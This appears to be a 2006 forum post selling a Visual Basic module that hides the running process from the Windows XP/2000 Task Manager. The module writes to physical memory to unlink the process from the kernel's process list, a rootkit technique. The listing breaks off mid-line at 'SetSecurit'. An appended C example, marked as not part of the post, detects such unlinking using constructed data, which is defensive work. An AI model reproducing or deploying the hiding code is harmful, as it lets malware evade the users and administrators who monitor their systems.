Posted on 2006-8-31 10:10:00
[sell=500]
The source code is as follows:

```vb
'Module name: modHideProcess.bas
'
'Module function: hides the current process in the XP/2K Task Manager process list
'
'Usage: call HideCurrentProcess() directly
'---------------------------------------------------------------------------------------

Option Explicit

Private Const STATUS_INFO_LENGTH_MISMATCH = &HC0000004
Private Const STATUS_ACCESS_DENIED = &HC0000022
Private Const STATUS_INVALID_HANDLE = &HC0000008
Private Const ERROR_SUCCESS = 0&
Private Const SECTION_MAP_WRITE = &H2
Private Const SECTION_MAP_READ = &H4
Private Const READ_CONTROL = &H20000
Private Const WRITE_DAC = &H40000
Private Const NO_INHERITANCE = 0
Private Const DACL_SECURITY_INFORMATION = &H4

Private Type IO_STATUS_BLOCK
    Status As Long
    Information As Long
End Type

Private Type UNICODE_STRING
    Length As Integer
    MaximumLength As Integer
    Buffer As Long
End Type

Private Const OBJ_INHERIT = &H2
Private Const OBJ_PERMANENT = &H10
Private Const OBJ_EXCLUSIVE = &H20
Private Const OBJ_CASE_INSENSITIVE = &H40
Private Const OBJ_OPENIF = &H80
Private Const OBJ_OPENLINK = &H100
Private Const OBJ_KERNEL_HANDLE = &H200
Private Const OBJ_VALID_ATTRIBUTES = &H3F2

Private Type OBJECT_ATTRIBUTES
    Length As Long
    RootDirectory As Long
    ObjectName As Long
    Attributes As Long
    SecurityDescriptor As Long
    SecurityQualityOfService As Long
End Type

Private Type ACL
    AclRevision As Byte
    Sbz1 As Byte
    AclSize As Integer
    AceCount As Integer
    Sbz2 As Integer
End Type

Private Enum ACCESS_MODE
    NOT_USED_ACCESS
    GRANT_ACCESS
    SET_ACCESS
    DENY_ACCESS
    REVOKE_ACCESS
    SET_AUDIT_SUCCESS
    SET_AUDIT_FAILURE
End Enum

Private Enum MULTIPLE_TRUSTEE_OPERATION
    NO_MULTIPLE_TRUSTEE
    TRUSTEE_IS_IMPERSONATE
End Enum

Private Enum TRUSTEE_FORM
    TRUSTEE_IS_SID
    TRUSTEE_IS_NAME
End Enum

Private Enum TRUSTEE_TYPE
    TRUSTEE_IS_UNKNOWN
    TRUSTEE_IS_USER
    TRUSTEE_IS_GROUP
End Enum

Private Type TRUSTEE
    pMultipleTrustee As Long
    MultipleTrusteeOperation As MULTIPLE_TRUSTEE_OPERATION
    TrusteeForm As TRUSTEE_FORM
    TrusteeType As TRUSTEE_TYPE
    ptstrName As String
End Type

Private Type EXPLICIT_ACCESS
    grfAccessPermissions As Long
    grfAccessMode As ACCESS_MODE
    grfInheritance As Long
    TRUSTEE As TRUSTEE
End Type

Private Type AceArray
    List() As EXPLICIT_ACCESS
End Type

Private Enum SE_OBJECT_TYPE
    SE_UNKNOWN_OBJECT_TYPE = 0
    SE_FILE_OBJECT
    SE_SERVICE
    SE_PRINTER
    SE_REGISTRY_KEY
    SE_LMSHARE
    SE_KERNEL_OBJECT
    SE_WINDOW_OBJECT
    SE_DS_OBJECT
    SE_DS_OBJECT_ALL
    SE_PROVIDER_DEFINED_OBJECT
    SE_WMIGUID_OBJECT
End Enum

Private Declare Function SetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, _
    ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, _
    ppsidGroup As Long, ppDacl As Any, ppSacl As Any) As Long
Private Declare Function GetSecurityInfo Lib "advapi32.dll" (ByVal Handle As Long, _
    ByVal ObjectType As SE_OBJECT_TYPE, ByVal SecurityInfo As Long, ppsidOwner As Long, _
    ppsidGroup As Long, ppDacl As Any, ppSacl As Any, ppSecurityDescriptor As Long) As Long

Private Declare Function SetEntriesInAcl Lib "advapi32.dll" Alias "SetEntriesInAclA" _
    (ByVal cCountOfExplicitEntries As Long, pListOfExplicitEntries As EXPLICIT_ACCESS, _
    ByVal OldAcl As Long, NewAcl As Long) As Long
Private Declare Sub BuildExplicitAccessWithName Lib "advapi32.dll" Alias "BuildExplicitAccessWithNameA" _
    (pExplicitAccess As EXPLICIT_ACCESS, ByVal pTrusteeName As String, _
    ByVal AccessPermissions As Long, ByVal AccessMode As ACCESS_MODE, ByVal Inheritance As Long)

Private Declare Sub RtlInitUnicodeString Lib "NTDLL.DLL" (DestinationString As UNICODE_STRING, _
    ByVal SourceString As Long)
Private Declare Function ZwOpenSection Lib "NTDLL.DLL" (SectionHandle As Long, _
    ByVal DesiredAccess As Long, ObjectAttributes As Any) As Long
Private Declare Function LocalFree Lib "kernel32" (ByVal hMem As Any) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function MapViewOfFile Lib "kernel32" (ByVal hFileMappingObject As Long, _
    ByVal dwDesiredAccess As Long, ByVal dwFileOffsetHigh As Long, _
    ByVal dwFileOffsetLow As Long, ByVal dwNumberOfBytesToMap As Long) As Long
Private Declare Function UnmapViewOfFile Lib "kernel32" (lpBaseAddress As Any) As Long
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, _
    Source As Any, ByVal Length As Long)
Private Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" _
    (LpVersionInformation As OSVERSIONINFO) As Long

Private Type OSVERSIONINFO
    dwOSVersionInfoSize As Long
    dwMajorVersion As Long
    dwMinorVersion As Long
    dwBuildNumber As Long
    dwPlatformId As Long
    szCSDVersion As String * 128
End Type

Private verinfo As OSVERSIONINFO

Private g_hNtDLL As Long
Private g_pMapPhysicalMemory As Long
Private g_hMPM As Long
Private aByte(3) As Byte

Public Sub HideCurrentProcess()
'Hide the current application's process in the process list

    Dim thread As Long, process As Long, fw As Long, bw As Long
    Dim lOffsetFlink As Long, lOffsetBlink As Long, lOffsetPID As Long

    verinfo.dwOSVersionInfoSize = Len(verinfo)
    If (GetVersionEx(verinfo)) <> 0 Then
        If verinfo.dwPlatformId = 2 Then
            If verinfo.dwMajorVersion = 5 Then
                Select Case verinfo.dwMinorVersion
                    Case 0
                        lOffsetFlink = &HA0
                        lOffsetBlink = &HA4
                        lOffsetPID = &H9C
                    Case 1
                        lOffsetFlink = &H88
                        lOffsetBlink = &H8C
                        lOffsetPID = &H84
                End Select
            End If
        End If
    End If

    If OpenPhysicalMemory <> 0 Then
        thread = GetData(&HFFDFF124)
        process = GetData(thread + &H44)
        fw = GetData(process + lOffsetFlink)
        bw = GetData(process + lOffsetBlink)
        SetData fw + 4, bw
        SetData bw, fw
        CloseHandle g_hMPM
    End If
End Sub

Private Sub SetPhyscialMemorySectionCanBeWrited(ByVal hSection As Long)
    Dim pDacl As Long
    Dim pNewDacl As Long
    Dim pSD As Long
    Dim dwRes As Long
    Dim ea As EXPLICIT_ACCESS

    GetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, _
        pDacl, 0, pSD

    ea.grfAccessPermissions = SECTION_MAP_WRITE
    ea.grfAccessMode = GRANT_ACCESS
    ea.grfInheritance = NO_INHERITANCE
    ea.TRUSTEE.TrusteeForm = TRUSTEE_IS_NAME
    ea.TRUSTEE.TrusteeType = TRUSTEE_IS_USER
    ea.TRUSTEE.ptstrName = "CURRENT_USER" & vbNullChar

    SetEntriesInAcl 1, ea, pDacl, pNewDacl

    SetSecurit
```
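Added example, not part of the original post: a defender-side integrity check for the unlinking that `HideCurrentProcess` performs, written as a C model over constructed data. The two `SetData` writes change only the neighbours' pointers, so an entry found by an independent source (assumed here: a memory scan, modelled by the raw array) whose neighbours do not point back is flagged; `struct entry`, `find_unlinked` and the PIDs are hypothetical names and values.

```c
#include <stddef.h>
#include <stdio.h>

/* Constructed model of a Flink/Blink process list; not real kernel memory. */
struct entry { struct entry *flink, *blink; unsigned pid; };

/* Append n entries to the circular list rooted at head. */
static void link_all(struct entry *head, struct entry *e, size_t n) {
    head->flink = head->blink = head;
    for (size_t i = 0; i < n; i++) {
        e[i].flink = head;
        e[i].blink = head->blink;
        head->blink->flink = &e[i];
        head->blink = &e[i];
    }
}

/* Sample-data helper: the same two neighbour writes as the post
   (SetData fw + 4, bw / SetData bw, fw); the entry's own links are untouched. */
static void unlink_like_post(struct entry *p) {
    p->flink->blink = p->blink;
    p->blink->flink = p->flink;
}

/* Flag candidates whose neighbours do not point back at them. The candidates
   must come from a source other than the list walk (assumed: a memory scan).
   Returns the number of PIDs written to out. */
size_t find_unlinked(const struct entry *cand, size_t n, unsigned *out) {
    size_t hits = 0;
    for (size_t i = 0; i < n; i++)
        if (cand[i].flink->blink != &cand[i] || cand[i].blink->flink != &cand[i])
            out[hits++] = cand[i].pid;
    return hits;
}

/* Constructed sample: four entries, PID 1337 unlinked. */
size_t demo(unsigned *out) {
    static struct entry head, procs[4];
    const unsigned pids[4] = {4, 612, 1337, 2040};
    for (int i = 0; i < 4; i++) procs[i].pid = pids[i];
    link_all(&head, procs, 4);
    unlink_like_post(&procs[2]);
    return find_unlinked(procs, 4, out);
}

int main(void) {
    unsigned out[4];
    size_t n = demo(out);
    for (size_t i = 0; i < n; i++) printf("unlinked entry: pid %u\n", out[i]);
    return 0;
}
```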